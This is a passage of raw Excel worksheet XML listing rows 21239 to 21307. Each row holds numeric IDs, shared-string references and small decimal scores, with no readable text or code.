      </c>
      <c r="F21239" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21240" ht="15.75" customHeight="1">
      <c r="A21240" s="1">
        <v>10175.0</v>
      </c>
      <c r="B21240" s="2">
        <v>5.7378093E7</v>
      </c>
      <c r="C21240" s="2" t="s">
        <v>20501</v>
      </c>
      <c r="D21240" s="2">
        <v>1.0</v>
      </c>
      <c r="E21240" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21240" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21241" ht="15.75" customHeight="1">
      <c r="A21241" s="1">
        <v>10207.0</v>
      </c>
      <c r="B21241" s="2">
        <v>5.7418067E7</v>
      </c>
      <c r="C21241" s="2" t="s">
        <v>20502</v>
      </c>
      <c r="D21241" s="2">
        <v>1.0</v>
      </c>
      <c r="E21241" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21241" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21242" ht="15.75" customHeight="1">
      <c r="A21242" s="1">
        <v>10491.0</v>
      </c>
      <c r="B21242" s="2">
        <v>1.1178647E7</v>
      </c>
      <c r="C21242" s="2" t="s">
        <v>20503</v>
      </c>
      <c r="D21242" s="2">
        <v>1.0</v>
      </c>
      <c r="E21242" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21242" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21243" ht="15.75" customHeight="1">
      <c r="A21243" s="1">
        <v>10520.0</v>
      </c>
      <c r="B21243" s="2">
        <v>1.1918734E7</v>
      </c>
      <c r="C21243" s="2" t="s">
        <v>20504</v>
      </c>
      <c r="D21243" s="2">
        <v>1.0</v>
      </c>
      <c r="E21243" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21243" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21244" ht="15.75" customHeight="1">
      <c r="A21244" s="1">
        <v>10950.0</v>
      </c>
      <c r="B21244" s="2">
        <v>1.7115568E7</v>
      </c>
      <c r="C21244" s="2" t="s">
        <v>20505</v>
      </c>
      <c r="D21244" s="2">
        <v>1.0</v>
      </c>
      <c r="E21244" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21244" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21245" ht="15.75" customHeight="1">
      <c r="A21245" s="1">
        <v>11032.0</v>
      </c>
      <c r="B21245" s="2">
        <v>1.7979249E7</v>
      </c>
      <c r="C21245" s="2" t="s">
        <v>20506</v>
      </c>
      <c r="D21245" s="2">
        <v>1.0</v>
      </c>
      <c r="E21245" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21245" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21246" ht="15.75" customHeight="1">
      <c r="A21246" s="1">
        <v>11541.0</v>
      </c>
      <c r="B21246" s="2">
        <v>2.2604061E7</v>
      </c>
      <c r="C21246" s="2" t="s">
        <v>20507</v>
      </c>
      <c r="D21246" s="2">
        <v>1.0</v>
      </c>
      <c r="E21246" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21246" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21247" ht="15.75" customHeight="1">
      <c r="A21247" s="1">
        <v>12957.0</v>
      </c>
      <c r="B21247" s="2">
        <v>3.2452837E7</v>
      </c>
      <c r="C21247" s="2" t="s">
        <v>20508</v>
      </c>
      <c r="D21247" s="2">
        <v>1.0</v>
      </c>
      <c r="E21247" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21247" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21248" ht="15.75" customHeight="1">
      <c r="A21248" s="1">
        <v>13052.0</v>
      </c>
      <c r="B21248" s="2">
        <v>3.3185921E7</v>
      </c>
      <c r="C21248" s="2" t="s">
        <v>20509</v>
      </c>
      <c r="D21248" s="2">
        <v>1.0</v>
      </c>
      <c r="E21248" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21248" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21249" ht="15.75" customHeight="1">
      <c r="A21249" s="1">
        <v>13276.0</v>
      </c>
      <c r="B21249" s="2">
        <v>3.4392058E7</v>
      </c>
      <c r="C21249" s="2" t="s">
        <v>20510</v>
      </c>
      <c r="D21249" s="2">
        <v>1.0</v>
      </c>
      <c r="E21249" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21249" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21250" ht="15.75" customHeight="1">
      <c r="A21250" s="1">
        <v>14383.0</v>
      </c>
      <c r="B21250" s="2">
        <v>3903249.0</v>
      </c>
      <c r="C21250" s="2" t="s">
        <v>20511</v>
      </c>
      <c r="D21250" s="2">
        <v>1.0</v>
      </c>
      <c r="E21250" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21250" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21251" ht="15.75" customHeight="1">
      <c r="A21251" s="1">
        <v>14480.0</v>
      </c>
      <c r="B21251" s="2">
        <v>3.9542525E7</v>
      </c>
      <c r="C21251" s="2" t="s">
        <v>20512</v>
      </c>
      <c r="D21251" s="2">
        <v>1.0</v>
      </c>
      <c r="E21251" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21251" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21252" ht="15.75" customHeight="1">
      <c r="A21252" s="1">
        <v>14793.0</v>
      </c>
      <c r="B21252" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C21252" s="2" t="s">
        <v>20513</v>
      </c>
      <c r="D21252" s="2">
        <v>1.0</v>
      </c>
      <c r="E21252" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21252" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21253" ht="15.75" customHeight="1">
      <c r="A21253" s="1">
        <v>15248.0</v>
      </c>
      <c r="B21253" s="2">
        <v>4.2284318E7</v>
      </c>
      <c r="C21253" s="2" t="s">
        <v>20514</v>
      </c>
      <c r="D21253" s="2">
        <v>1.0</v>
      </c>
      <c r="E21253" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21253" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21254" ht="15.75" customHeight="1">
      <c r="A21254" s="1">
        <v>15250.0</v>
      </c>
      <c r="B21254" s="2">
        <v>4.2284318E7</v>
      </c>
      <c r="C21254" s="2" t="s">
        <v>20515</v>
      </c>
      <c r="D21254" s="2">
        <v>1.0</v>
      </c>
      <c r="E21254" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21254" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21255" ht="15.75" customHeight="1">
      <c r="A21255" s="1">
        <v>15345.0</v>
      </c>
      <c r="B21255" s="2">
        <v>4.2616911E7</v>
      </c>
      <c r="C21255" s="2" t="s">
        <v>20516</v>
      </c>
      <c r="D21255" s="2">
        <v>1.0</v>
      </c>
      <c r="E21255" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21255" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21256" ht="15.75" customHeight="1">
      <c r="A21256" s="1">
        <v>15349.0</v>
      </c>
      <c r="B21256" s="2">
        <v>4.2634182E7</v>
      </c>
      <c r="C21256" s="2" t="s">
        <v>20517</v>
      </c>
      <c r="D21256" s="2">
        <v>1.0</v>
      </c>
      <c r="E21256" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21256" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21257" ht="15.75" customHeight="1">
      <c r="A21257" s="1">
        <v>15470.0</v>
      </c>
      <c r="B21257" s="2">
        <v>4.3128466E7</v>
      </c>
      <c r="C21257" s="2" t="s">
        <v>20518</v>
      </c>
      <c r="D21257" s="2">
        <v>1.0</v>
      </c>
      <c r="E21257" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21257" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21258" ht="15.75" customHeight="1">
      <c r="A21258" s="1">
        <v>15570.0</v>
      </c>
      <c r="B21258" s="2">
        <v>4.3430923E7</v>
      </c>
      <c r="C21258" s="2" t="s">
        <v>20514</v>
      </c>
      <c r="D21258" s="2">
        <v>1.0</v>
      </c>
      <c r="E21258" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21258" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21259" ht="15.75" customHeight="1">
      <c r="A21259" s="1">
        <v>16203.0</v>
      </c>
      <c r="B21259" s="2">
        <v>4.5678364E7</v>
      </c>
      <c r="C21259" s="2" t="s">
        <v>20519</v>
      </c>
      <c r="D21259" s="2">
        <v>1.0</v>
      </c>
      <c r="E21259" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21259" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21260" ht="15.75" customHeight="1">
      <c r="A21260" s="1">
        <v>16226.0</v>
      </c>
      <c r="B21260" s="2">
        <v>4.5719827E7</v>
      </c>
      <c r="C21260" s="2" t="s">
        <v>20520</v>
      </c>
      <c r="D21260" s="2">
        <v>1.0</v>
      </c>
      <c r="E21260" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21260" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21261" ht="15.75" customHeight="1">
      <c r="A21261" s="1">
        <v>16495.0</v>
      </c>
      <c r="B21261" s="2">
        <v>4.655647E7</v>
      </c>
      <c r="C21261" s="2" t="s">
        <v>20521</v>
      </c>
      <c r="D21261" s="2">
        <v>1.0</v>
      </c>
      <c r="E21261" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21261" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21262" ht="15.75" customHeight="1">
      <c r="A21262" s="1">
        <v>17002.0</v>
      </c>
      <c r="B21262" s="2">
        <v>4.8413162E7</v>
      </c>
      <c r="C21262" s="2" t="s">
        <v>20522</v>
      </c>
      <c r="D21262" s="2">
        <v>1.0</v>
      </c>
      <c r="E21262" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21262" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21263" ht="15.75" customHeight="1">
      <c r="A21263" s="1">
        <v>17254.0</v>
      </c>
      <c r="B21263" s="2">
        <v>4.9119288E7</v>
      </c>
      <c r="C21263" s="2" t="s">
        <v>20523</v>
      </c>
      <c r="D21263" s="2">
        <v>1.0</v>
      </c>
      <c r="E21263" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21263" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21264" ht="15.75" customHeight="1">
      <c r="A21264" s="1">
        <v>17585.0</v>
      </c>
      <c r="B21264" s="2">
        <v>5.0289048E7</v>
      </c>
      <c r="C21264" s="2" t="s">
        <v>20524</v>
      </c>
      <c r="D21264" s="2">
        <v>1.0</v>
      </c>
      <c r="E21264" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21264" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21265" ht="15.75" customHeight="1">
      <c r="A21265" s="1">
        <v>17695.0</v>
      </c>
      <c r="B21265" s="2">
        <v>5.0529546E7</v>
      </c>
      <c r="C21265" s="2" t="s">
        <v>20525</v>
      </c>
      <c r="D21265" s="2">
        <v>1.0</v>
      </c>
      <c r="E21265" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21265" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21266" ht="15.75" customHeight="1">
      <c r="A21266" s="1">
        <v>17728.0</v>
      </c>
      <c r="B21266" s="2">
        <v>5.0669493E7</v>
      </c>
      <c r="C21266" s="2" t="s">
        <v>20526</v>
      </c>
      <c r="D21266" s="2">
        <v>1.0</v>
      </c>
      <c r="E21266" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21266" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21267" ht="15.75" customHeight="1">
      <c r="A21267" s="1">
        <v>17961.0</v>
      </c>
      <c r="B21267" s="2">
        <v>5.1298843E7</v>
      </c>
      <c r="C21267" s="2" t="s">
        <v>20527</v>
      </c>
      <c r="D21267" s="2">
        <v>1.0</v>
      </c>
      <c r="E21267" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21267" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21268" ht="15.75" customHeight="1">
      <c r="A21268" s="1">
        <v>18050.0</v>
      </c>
      <c r="B21268" s="2">
        <v>5.1576046E7</v>
      </c>
      <c r="C21268" s="2" t="s">
        <v>20528</v>
      </c>
      <c r="D21268" s="2">
        <v>1.0</v>
      </c>
      <c r="E21268" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21268" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21269" ht="15.75" customHeight="1">
      <c r="A21269" s="1">
        <v>18090.0</v>
      </c>
      <c r="B21269" s="2">
        <v>5.1680959E7</v>
      </c>
      <c r="C21269" s="2" t="s">
        <v>20529</v>
      </c>
      <c r="D21269" s="2">
        <v>1.0</v>
      </c>
      <c r="E21269" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21269" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21270" ht="15.75" customHeight="1">
      <c r="A21270" s="1">
        <v>18268.0</v>
      </c>
      <c r="B21270" s="2">
        <v>5.2205188E7</v>
      </c>
      <c r="C21270" s="2" t="s">
        <v>20530</v>
      </c>
      <c r="D21270" s="2">
        <v>1.0</v>
      </c>
      <c r="E21270" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21270" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21271" ht="15.75" customHeight="1">
      <c r="A21271" s="1">
        <v>18754.0</v>
      </c>
      <c r="B21271" s="2">
        <v>5.3784846E7</v>
      </c>
      <c r="C21271" s="2" t="s">
        <v>20531</v>
      </c>
      <c r="D21271" s="2">
        <v>1.0</v>
      </c>
      <c r="E21271" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21271" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21272" ht="15.75" customHeight="1">
      <c r="A21272" s="1">
        <v>18756.0</v>
      </c>
      <c r="B21272" s="2">
        <v>5.3784846E7</v>
      </c>
      <c r="C21272" s="2" t="s">
        <v>20532</v>
      </c>
      <c r="D21272" s="2">
        <v>1.0</v>
      </c>
      <c r="E21272" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21272" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21273" ht="15.75" customHeight="1">
      <c r="A21273" s="1">
        <v>18838.0</v>
      </c>
      <c r="B21273" s="2">
        <v>5.396119E7</v>
      </c>
      <c r="C21273" s="2" t="s">
        <v>20533</v>
      </c>
      <c r="D21273" s="2">
        <v>1.0</v>
      </c>
      <c r="E21273" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21273" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21274" ht="15.75" customHeight="1">
      <c r="A21274" s="1">
        <v>18848.0</v>
      </c>
      <c r="B21274" s="2">
        <v>5.3977008E7</v>
      </c>
      <c r="C21274" s="2" t="s">
        <v>20534</v>
      </c>
      <c r="D21274" s="2">
        <v>1.0</v>
      </c>
      <c r="E21274" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21274" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21275" ht="15.75" customHeight="1">
      <c r="A21275" s="1">
        <v>18961.0</v>
      </c>
      <c r="B21275" s="2">
        <v>5.435524E7</v>
      </c>
      <c r="C21275" s="2" t="s">
        <v>20535</v>
      </c>
      <c r="D21275" s="2">
        <v>1.0</v>
      </c>
      <c r="E21275" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21275" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21276" ht="15.75" customHeight="1">
      <c r="A21276" s="1">
        <v>19510.0</v>
      </c>
      <c r="B21276" s="2">
        <v>5.5927641E7</v>
      </c>
      <c r="C21276" s="2" t="s">
        <v>20536</v>
      </c>
      <c r="D21276" s="2">
        <v>1.0</v>
      </c>
      <c r="E21276" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21276" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21277" ht="15.75" customHeight="1">
      <c r="A21277" s="1">
        <v>19680.0</v>
      </c>
      <c r="B21277" s="2">
        <v>5.6435277E7</v>
      </c>
      <c r="C21277" s="2" t="s">
        <v>20537</v>
      </c>
      <c r="D21277" s="2">
        <v>1.0</v>
      </c>
      <c r="E21277" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21277" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21278" ht="15.75" customHeight="1">
      <c r="A21278" s="1">
        <v>21294.0</v>
      </c>
      <c r="B21278" s="2">
        <v>2.0559147E7</v>
      </c>
      <c r="C21278" s="2" t="s">
        <v>20538</v>
      </c>
      <c r="D21278" s="2">
        <v>1.0</v>
      </c>
      <c r="E21278" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21278" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21279" ht="15.75" customHeight="1">
      <c r="A21279" s="1">
        <v>22681.0</v>
      </c>
      <c r="B21279" s="2">
        <v>4198173.0</v>
      </c>
      <c r="C21279" s="2" t="s">
        <v>20539</v>
      </c>
      <c r="D21279" s="2">
        <v>1.0</v>
      </c>
      <c r="E21279" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21279" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21280" ht="15.75" customHeight="1">
      <c r="A21280" s="1">
        <v>23587.0</v>
      </c>
      <c r="B21280" s="2">
        <v>6297915.0</v>
      </c>
      <c r="C21280" s="2" t="s">
        <v>20540</v>
      </c>
      <c r="D21280" s="2">
        <v>1.0</v>
      </c>
      <c r="E21280" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21280" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21281" ht="15.75" customHeight="1">
      <c r="A21281" s="1">
        <v>24052.0</v>
      </c>
      <c r="B21281" s="2">
        <v>9560126.0</v>
      </c>
      <c r="C21281" s="2" t="s">
        <v>20541</v>
      </c>
      <c r="D21281" s="2">
        <v>1.0</v>
      </c>
      <c r="E21281" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21281" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21282" ht="15.75" customHeight="1">
      <c r="A21282" s="1">
        <v>24152.0</v>
      </c>
      <c r="B21282" s="2">
        <v>1.0082543E7</v>
      </c>
      <c r="C21282" s="2" t="s">
        <v>20542</v>
      </c>
      <c r="D21282" s="2">
        <v>1.0</v>
      </c>
      <c r="E21282" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21282" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21283" ht="15.75" customHeight="1">
      <c r="A21283" s="1">
        <v>24175.0</v>
      </c>
      <c r="B21283" s="2">
        <v>1.0204735E7</v>
      </c>
      <c r="C21283" s="2" t="s">
        <v>20543</v>
      </c>
      <c r="D21283" s="2">
        <v>1.0</v>
      </c>
      <c r="E21283" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21283" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21284" ht="15.75" customHeight="1">
      <c r="A21284" s="1">
        <v>26341.0</v>
      </c>
      <c r="B21284" s="2">
        <v>1.6763722E7</v>
      </c>
      <c r="C21284" s="2" t="s">
        <v>20544</v>
      </c>
      <c r="D21284" s="2">
        <v>1.0</v>
      </c>
      <c r="E21284" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21284" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21285" ht="15.75" customHeight="1">
      <c r="A21285" s="1">
        <v>27651.0</v>
      </c>
      <c r="B21285" s="2">
        <v>2.2814604E7</v>
      </c>
      <c r="C21285" s="2" t="s">
        <v>20545</v>
      </c>
      <c r="D21285" s="2">
        <v>1.0</v>
      </c>
      <c r="E21285" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21285" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21286" ht="15.75" customHeight="1">
      <c r="A21286" s="1">
        <v>29253.0</v>
      </c>
      <c r="B21286" s="2">
        <v>3.0861435E7</v>
      </c>
      <c r="C21286" s="2" t="s">
        <v>20546</v>
      </c>
      <c r="D21286" s="2">
        <v>1.0</v>
      </c>
      <c r="E21286" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21286" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21287" ht="15.75" customHeight="1">
      <c r="A21287" s="1">
        <v>29874.0</v>
      </c>
      <c r="B21287" s="2">
        <v>3.6022638E7</v>
      </c>
      <c r="C21287" s="2" t="s">
        <v>20547</v>
      </c>
      <c r="D21287" s="2">
        <v>1.0</v>
      </c>
      <c r="E21287" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21287" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21288" ht="15.75" customHeight="1">
      <c r="A21288" s="1">
        <v>30715.0</v>
      </c>
      <c r="B21288" s="2">
        <v>4.3197423E7</v>
      </c>
      <c r="C21288" s="2" t="s">
        <v>20548</v>
      </c>
      <c r="D21288" s="2">
        <v>1.0</v>
      </c>
      <c r="E21288" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21288" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21289" ht="15.75" customHeight="1">
      <c r="A21289" s="1">
        <v>31005.0</v>
      </c>
      <c r="B21289" s="2">
        <v>4.7672477E7</v>
      </c>
      <c r="C21289" s="2" t="s">
        <v>20549</v>
      </c>
      <c r="D21289" s="2">
        <v>1.0</v>
      </c>
      <c r="E21289" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21289" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21290" ht="15.75" customHeight="1">
      <c r="A21290" s="1">
        <v>32334.0</v>
      </c>
      <c r="B21290" s="2">
        <v>5.5845992E7</v>
      </c>
      <c r="C21290" s="2" t="s">
        <v>20550</v>
      </c>
      <c r="D21290" s="2">
        <v>1.0</v>
      </c>
      <c r="E21290" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21290" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21291" ht="15.75" customHeight="1">
      <c r="A21291" s="1">
        <v>32572.0</v>
      </c>
      <c r="B21291" s="2">
        <v>5769472.0</v>
      </c>
      <c r="C21291" s="2" t="s">
        <v>20551</v>
      </c>
      <c r="D21291" s="2">
        <v>1.0</v>
      </c>
      <c r="E21291" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21291" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21292" ht="15.75" customHeight="1">
      <c r="A21292" s="1">
        <v>32602.0</v>
      </c>
      <c r="B21292" s="2">
        <v>5820485.0</v>
      </c>
      <c r="C21292" s="2" t="s">
        <v>20552</v>
      </c>
      <c r="D21292" s="2">
        <v>1.0</v>
      </c>
      <c r="E21292" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21292" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21293" ht="15.75" customHeight="1">
      <c r="A21293" s="1">
        <v>32867.0</v>
      </c>
      <c r="B21293" s="2">
        <v>6297914.0</v>
      </c>
      <c r="C21293" s="2" t="s">
        <v>20540</v>
      </c>
      <c r="D21293" s="2">
        <v>1.0</v>
      </c>
      <c r="E21293" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21293" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21294" ht="15.75" customHeight="1">
      <c r="A21294" s="1">
        <v>33396.0</v>
      </c>
      <c r="B21294" s="2">
        <v>7702556.0</v>
      </c>
      <c r="C21294" s="2" t="s">
        <v>20553</v>
      </c>
      <c r="D21294" s="2">
        <v>1.0</v>
      </c>
      <c r="E21294" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21294" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21295" ht="15.75" customHeight="1">
      <c r="A21295" s="1">
        <v>33510.0</v>
      </c>
      <c r="B21295" s="2">
        <v>8080337.0</v>
      </c>
      <c r="C21295" s="2" t="s">
        <v>20554</v>
      </c>
      <c r="D21295" s="2">
        <v>1.0</v>
      </c>
      <c r="E21295" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21295" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="21296" ht="15.75" customHeight="1">
      <c r="A21296" s="1">
        <v>296.0</v>
      </c>
      <c r="B21296" s="2">
        <v>1.5508655E7</v>
      </c>
      <c r="C21296" s="2" t="s">
        <v>20555</v>
      </c>
      <c r="D21296" s="2">
        <v>1.0</v>
      </c>
      <c r="E21296" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21296" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21297" ht="15.75" customHeight="1">
      <c r="A21297" s="1">
        <v>1037.0</v>
      </c>
      <c r="B21297" s="2">
        <v>2.3250296E7</v>
      </c>
      <c r="C21297" s="2" t="s">
        <v>20556</v>
      </c>
      <c r="D21297" s="2">
        <v>1.0</v>
      </c>
      <c r="E21297" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21297" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21298" ht="15.75" customHeight="1">
      <c r="A21298" s="1">
        <v>1655.0</v>
      </c>
      <c r="B21298" s="2">
        <v>2.8131851E7</v>
      </c>
      <c r="C21298" s="2" t="s">
        <v>20557</v>
      </c>
      <c r="D21298" s="2">
        <v>1.0</v>
      </c>
      <c r="E21298" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21298" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21299" ht="15.75" customHeight="1">
      <c r="A21299" s="1">
        <v>2749.0</v>
      </c>
      <c r="B21299" s="2">
        <v>3.5056276E7</v>
      </c>
      <c r="C21299" s="2" t="s">
        <v>20558</v>
      </c>
      <c r="D21299" s="2">
        <v>1.0</v>
      </c>
      <c r="E21299" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21299" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21300" ht="15.75" customHeight="1">
      <c r="A21300" s="1">
        <v>3267.0</v>
      </c>
      <c r="B21300" s="2">
        <v>3.7468415E7</v>
      </c>
      <c r="C21300" s="2" t="s">
        <v>20559</v>
      </c>
      <c r="D21300" s="2">
        <v>1.0</v>
      </c>
      <c r="E21300" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21300" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21301" ht="15.75" customHeight="1">
      <c r="A21301" s="1">
        <v>3441.0</v>
      </c>
      <c r="B21301" s="2">
        <v>3.82321E7</v>
      </c>
      <c r="C21301" s="2" t="s">
        <v>20560</v>
      </c>
      <c r="D21301" s="2">
        <v>1.0</v>
      </c>
      <c r="E21301" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21301" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21302" ht="15.75" customHeight="1">
      <c r="A21302" s="1">
        <v>3459.0</v>
      </c>
      <c r="B21302" s="2">
        <v>3.828309E7</v>
      </c>
      <c r="C21302" s="2" t="s">
        <v>20561</v>
      </c>
      <c r="D21302" s="2">
        <v>1.0</v>
      </c>
      <c r="E21302" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21302" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21303" ht="15.75" customHeight="1">
      <c r="A21303" s="1">
        <v>5514.0</v>
      </c>
      <c r="B21303" s="2">
        <v>4.5840978E7</v>
      </c>
      <c r="C21303" s="2" t="s">
        <v>20562</v>
      </c>
      <c r="D21303" s="2">
        <v>1.0</v>
      </c>
      <c r="E21303" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21303" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21304" ht="15.75" customHeight="1">
      <c r="A21304" s="1">
        <v>7298.0</v>
      </c>
      <c r="B21304" s="2">
        <v>5.0837609E7</v>
      </c>
      <c r="C21304" s="2" t="s">
        <v>20563</v>
      </c>
      <c r="D21304" s="2">
        <v>1.0</v>
      </c>
      <c r="E21304" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21304" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21305" ht="15.75" customHeight="1">
      <c r="A21305" s="1">
        <v>8698.0</v>
      </c>
      <c r="B21305" s="2">
        <v>5.4433702E7</v>
      </c>
      <c r="C21305" s="2" t="s">
        <v>20564</v>
      </c>
      <c r="D21305" s="2">
        <v>1.0</v>
      </c>
      <c r="E21305" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21305" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21306" ht="15.75" customHeight="1">
      <c r="A21306" s="1">
        <v>9524.0</v>
      </c>
      <c r="B21306" s="2">
        <v>5.5980269E7</v>
      </c>
      <c r="C21306" s="2" t="s">
        <v>20565</v>
      </c>
      <c r="D21306" s="2">
        <v>1.0</v>
      </c>
      <c r="E21306" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F21306" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="21307" ht="15.75" customHeight="1">
